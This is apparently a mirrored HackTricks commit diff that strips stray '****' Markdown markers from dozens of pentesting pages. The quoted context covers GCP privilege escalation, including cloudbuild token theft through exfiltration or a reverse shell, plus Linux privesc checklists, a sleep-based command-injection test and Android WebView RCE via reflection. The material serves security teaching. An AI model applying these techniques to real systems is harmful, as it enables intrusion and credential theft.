mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 12:13:17 +00:00
remove ****
This commit is contained in:
parent
ce6088de55
commit
53c42a509d
66 changed files with 108 additions and 108 deletions
|
@ -310,7 +310,7 @@ Also keep an eye out for instances that have the default service account assigne
|
|||
|
||||
Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).
|
||||
|
||||
Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) **** stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
|
||||
Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
|
||||
|
||||
Check if any service account has exported a key at some point with:
|
||||
|
||||
|
|
|
@ -90,7 +90,7 @@ If you compromises a compute instance you should also check the actions mentione
|
|||
gcloud compute images list --no-standard-images
|
||||
```
|
||||
|
||||
You can then **** [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
|
||||
You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
|
||||
|
||||
```bash
|
||||
gcloud compute images export --image test-image \
|
||||
|
|
|
@ -47,7 +47,7 @@ Note that according to the [**documentation**](https://cloud.google.com/iam/docs
|
|||
|
||||
### iam.serviceAccounts.signBlob
|
||||
|
||||
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA **** we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
|
||||
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
|
||||
|
||||
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
|
||||
|
||||
|
@ -146,7 +146,7 @@ This is like the previous abuse but instead of directly creating a new deploymen
|
|||
With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the powerful cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
|
||||
Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
|
||||
|
||||
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) **** (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) **** and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) **** (in the code you can find how to specify other service accounts)**.**
|
||||
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
|
||||
|
||||
For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
|
||||
|
||||
|
|
|
@ -38,7 +38,7 @@ In this exam I **missed the opportunity to exploit more vulnerabilities**, howev
|
|||
This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
|
||||
Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
|
||||
|
||||
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, **** if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
|
||||
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
|
||||
|
||||
### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
|
||||
|
||||
|
@ -56,13 +56,13 @@ It's a very interesting basic course about **how to use the ML environment provi
|
|||
|
||||
## Course: **Machine Learning with scikit-learn Starter Pass**
|
||||
|
||||
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) **** you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. 
|
||||
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. 
|
||||
|
||||
It's definitely recommended for people that haven't use scikit-learn (but know python)
|
||||
|
||||
## **Course: Classification Algorithms**
|
||||
|
||||
The **** [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) **** is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
|
||||
The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
|
||||
|
||||
It also shows how to **create models** with with **scikit-learn.**
|
||||
|
||||
|
|
|
@ -127,7 +127,7 @@ openssl x509 -inform der -in certificatename.der -out certificatename.pem
|
|||
|
||||
**Convert PEM to P7B**
|
||||
|
||||
**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. **** A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
|
||||
**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
|
||||
|
||||
```
|
||||
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
|
||||
|
|
|
@ -87,7 +87,7 @@ dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
|
|||
|
||||
### Dive
|
||||
|
||||
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) **** (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
|
||||
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
|
||||
|
||||
```bash
|
||||
#First you need to load the image in your docker repo
|
||||
|
|
|
@ -248,9 +248,9 @@ Look in all available log files on the compromised system for traces of maliciou
|
|||
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
|
||||
Interesting system logons:
|
||||
|
||||
*  **/var/log/syslog** (debian) **** or **/var/log/messages** (Redhat)
|
||||
*  **/var/log/syslog** (debian) or **/var/log/messages** (Redhat)
|
||||
* Shows general messages and info regarding the system. Basically a data log of all activity throughout the global system.
|
||||
*  **/var/log/auth.log** (debian) **** or **/var/log/secure** (Redhat)
|
||||
*  **/var/log/auth.log** (debian) or **/var/log/secure** (Redhat)
|
||||
* Keep authentication logs for both successful or failed logins, and authentication processes. Storage depends on system type.
|
||||
* `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
|
||||
* **/var/log/boot.log**: start-up messages and boot info.
|
||||
|
|
|
@ -69,12 +69,12 @@ clamscan folderpath #Scan the hole folder
|
|||
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**.\
|
||||
To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
|
||||
|
||||
A tool to create or modify IOCs is **** [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
|
||||
****You can use tools such as **** [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **** to **search for defined IOCs in a device**.
|
||||
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
|
||||
****You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
|
||||
|
||||
### Loki
|
||||
|
||||
****[**Loki**](https://github.com/Neo23x0/Loki) **** is a scanner for Simple Indicators of Compromise.\
|
||||
****[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
|
||||
Detection is based on four detection methods:
|
||||
|
||||
```
|
||||
|
|
|
@ -164,7 +164,7 @@ The **root directory** occupies a **specific position** for both FAT12 and FAT16
|
|||
* Address of the FAT table where the first cluster of the file starts
|
||||
* Size
|
||||
|
||||
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to **** 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
|
||||
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
|
||||
|
||||
### **NTFS**
|
||||
|
||||
|
|
|
@ -142,7 +142,7 @@ Some interesting attributes:
|
|||
|
||||
![](<../../../.gitbook/assets/image (512).png>)
|
||||
|
||||
Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) **** (select the mft file or the image and press dump all and extract to extract al the objects).\
|
||||
Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (select the mft file or the image and press dump all and extract to extract al the objects).\
|
||||
This program will extract all the MFT data and present it in CSV format. It can also be used to dump the files.
|
||||
|
||||
![](<../../../.gitbook/assets/image (513).png>)
|
||||
|
|
|
@ -28,7 +28,7 @@ You can find some Wireshark trick in:
|
|||
|
||||
### Xplico Framework
|
||||
|
||||
****[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ **** can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
|
||||
****[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
|
||||
|
||||
#### Install
|
||||
|
||||
|
|
|
@ -48,7 +48,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\<ProfileName>/_) pa
|
|||
* _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol)
|
||||
* _**persdict.dat**_ : Words added to the dictionary
|
||||
* _**addons.json**_ and _**extensions.sqlite** _ : Installed addons and extensions
|
||||
* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) **** can be used in Windows to inspect this file.
|
||||
* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file.
|
||||
* _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**.
|
||||
|
||||
 Information that can be obtained:
|
||||
|
@ -96,7 +96,7 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa
|
|||
* Reloaded
|
||||
* _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies.
|
||||
* _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca
|
||||
* _**Bookmarks**_ : **** Bookmarks 
|
||||
* _**Bookmarks**_ : Bookmarks 
|
||||
* _**Web Data**_ : Form History
|
||||
* _**Favicons**_ : Favicons
|
||||
* _**Login Data**_ : Login information (usernames, passwords...)
|
||||
|
|
|
@ -99,11 +99,11 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
* [ ] ****[**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
|
||||
* [ ] ****[**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
|
||||
* [ ] ****[**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)****
|
||||
* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) **** from a writable folder?
|
||||
* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
|
||||
* [ ] ****[**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
|
||||
* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
|
||||
* [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
|
||||
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) **** command
|
||||
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) command
|
||||
|
||||
### [Capabilities](privilege-escalation/#capabilities)
|
||||
|
||||
|
@ -150,8 +150,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
|
||||
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>)
|
||||
|
|
|
@ -290,7 +290,7 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration
|
|||
* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
|
||||
* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
|
||||
* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
|
||||
* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) **** to prevent processes from gaining more privileges, for example through suid binaries.
|
||||
* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries.
|
||||
* ****[**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks.
|
||||
* **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required.
|
||||
* **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP.
|
||||
|
|
|
@ -13,7 +13,7 @@ seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SEC
|
|||
|
||||
### **Original/Strict Mode**
|
||||
|
||||
In this mode **** Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
|
||||
In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
|
||||
|
||||
{% code title="seccomp_strict.c" %}
|
||||
```c
|
||||
|
|
|
@ -1420,7 +1420,7 @@ while True:
|
|||
|
||||
### CAP\_NET\_ADMIN + CAP\_NET\_RAW
|
||||
|
||||
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) **** allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
|
||||
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
|
||||
|
||||
#### Example with binary
|
||||
|
||||
|
@ -1480,7 +1480,7 @@ sudo chattr -i file.txt
|
|||
|
||||
### CAP\_SYS\_CHROOT
|
||||
|
||||
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) **** permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
|
||||
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
|
||||
|
||||
* [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
|
||||
* [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
|
||||
|
|
|
@ -128,7 +128,7 @@ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
|||
|
||||
## DNS data exfiltration
|
||||
|
||||
You could use **burpcollab** or [**pingb**](http://pingb.in) **** for example.
|
||||
You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
|
||||
|
||||
## Polyglot command injection
|
||||
|
||||
|
|
|
@ -78,7 +78,7 @@ On the **other** hand, many familiar pieces of Mac OS X are **not open source**.
|
|||
|
||||
### **Universal binaries**
|
||||
|
||||
Mac OS binaries usually are compiled as universal binaries. **** A **universal binary** can **support multiple architectures in the same file**.
|
||||
Mac OS binaries usually are compiled as universal binaries. A **universal binary** can **support multiple architectures in the same file**.
|
||||
|
||||
```bash
|
||||
file /bin/ls
|
||||
|
@ -145,7 +145,7 @@ _A segment defines a **range of bytes** in a Mach-O file and the **addresses** a
|
|||
Common segments:
|
||||
|
||||
* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment:
|
||||
* `__text`: **** Compiled binary code
|
||||
* `__text`: Compiled binary code
|
||||
* `__const`: Constant data
|
||||
* `__cstring`: String constants
|
||||
* **`__DATA`**: Contains data that is **writable.**
|
||||
|
@ -155,7 +155,7 @@ Common segments:
|
|||
* **`__LINKEDIT`**: Contains information for the linker (dyld) such as, "symbol, string, and relocation table entries."
|
||||
* **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections.
|
||||
* **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code.
|
||||
* **`LC_LOAD_DYLIB`**: **** This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires.
|
||||
* **`LC_LOAD_DYLIB`**: This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires.
|
||||
|
||||
* This load command is a structure of type **`dylib_command`** (which contains a struct dylib, describing the actual dependent dynamic library):
|
||||
|
||||
|
@ -261,10 +261,10 @@ Note that this names can be obfuscated to make the reversing of the binary more
|
|||
|
||||
There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
|
||||
|
||||
* **Platypus**: Generate MacOS binary executing **** shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
|
||||
* **Platypus**: Generate MacOS binary executing shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
|
||||
* **It saves the script in `Contents/Resources/script`. So finding this script is a good indicator that Platypus was used.**
|
||||
* **PyInstaller:** Python
|
||||
* Ways to detect this is the use of the embedded **** string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.**
|
||||
* Ways to detect this is the use of the embedded string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.**
|
||||
* **Electron:** JavaScript, HTML, and CSS.
|
||||
* These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\
|
||||
|
||||
|
|
|
@ -264,7 +264,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
|
|||
|
||||
### Internal Handlers
|
||||
|
||||
[**Checkout this section**](./#file-extensions-apps) **** to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
|
||||
[**Checkout this section**](./#file-extensions-apps) to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
|
||||
|
||||
### Enumerating Network Processes
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
## Intro
|
||||
|
||||
As **** [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected.
|
||||
|
||||
**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)****
|
||||
|
|
|
@ -830,7 +830,7 @@ f(42)
|
|||
|
||||
## Decompiling Compiled Python
|
||||
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
|
||||
|
||||
**Check out this tutorial**:
|
||||
|
||||
|
|
|
@ -184,7 +184,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
|
|||
|
||||
### Command line options
|
||||
|
||||
However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can **** [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
|
||||
However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
|
||||
|
||||
#### Boot
|
||||
|
||||
|
|
|
@ -105,7 +105,7 @@ If `addJavascriptInterface` is necessary, take the following considerations:
|
|||
|
||||
### Javascript Bridge to RCE via Reflection
|
||||
|
||||
As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) **** once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
|
||||
As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
|
||||
|
||||
```markup
|
||||
<!-- javascriptBridge is the name of the Android exposed object -->
|
||||
|
|
|
@ -64,8 +64,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
